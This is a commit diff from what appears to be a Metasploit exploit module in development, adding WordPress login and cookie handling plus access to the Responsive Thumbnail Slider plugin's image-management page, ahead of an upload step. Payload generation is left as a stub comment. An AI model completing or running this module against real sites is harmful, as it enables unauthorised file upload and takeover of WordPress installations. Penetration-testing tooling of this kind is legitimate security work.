authenticating to WordPress

GSoC/Meterpreter_Web_Console
Shelby Pace 2018-07-25 14:22:24 -05:00
parent 668bcb38cb
commit 8f89275df8
No known key found for this signature in database
GPG Key ID: B2F3A8B476406857
1 changed files with 58 additions and 1 deletions

View File

@ -45,12 +45,69 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def check def check
# check for WordPress
# check if plugin is installed
end end
# log into Wordpress # log into Wordpress
# access 'manage images' page # access 'manage images' page
# upload file # upload file
def exploit def login
wp_uri = normalize_uri(target_uri.path, 'wp-login.php')
res = send_request_cgi(
'method' => 'GET',
'uri' => wp_uri
)
if res && res.body.include?("WordPress") && res.body.include?("200")
print_status("WordPress accessed")
else
fail_with(Failure::NotFound, "Failed to access WordPress Login Page")
end
redirect_uri = normalize_uri(target_uri.path, 'wp-admin/')
cookies = res.get_cookies
wp_login_res = send_request_cgi(
'method' => 'POST',
'uri' => wp_uri,
'cookie' => cookies,
'vars_post' => {
'log' => datastore['USERNAME'],
'pwd' => datastore['PASSWORD'],
'wp-submit' => 'Log In',
'redirect_to' => redirect_uri
}
)
auth_cookies = wp_login_res.get_cookies
auth_res = send_request_cgi(
'method' => 'GET',
'uri' => redirect_uri,
'cookie' => auth_cookies
)
return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_res && auth_res.body.include?("wpadminbar")
print_good("Logged into WordPress")
upload_payload(auth_cookies)
end end
def upload_payload(cookies)
# attempt to access plugins page
plugin_res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'wp-admin/', 'admin.php?page=responsive_thumbnail_slider_image_management'),
'cookie' => cookies
)
unless plugin_res && plugin_res.body.include?("tmpl-uploader-window")
fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Plugin Page")
end
# generate payload
end
def exploit
login
end
end end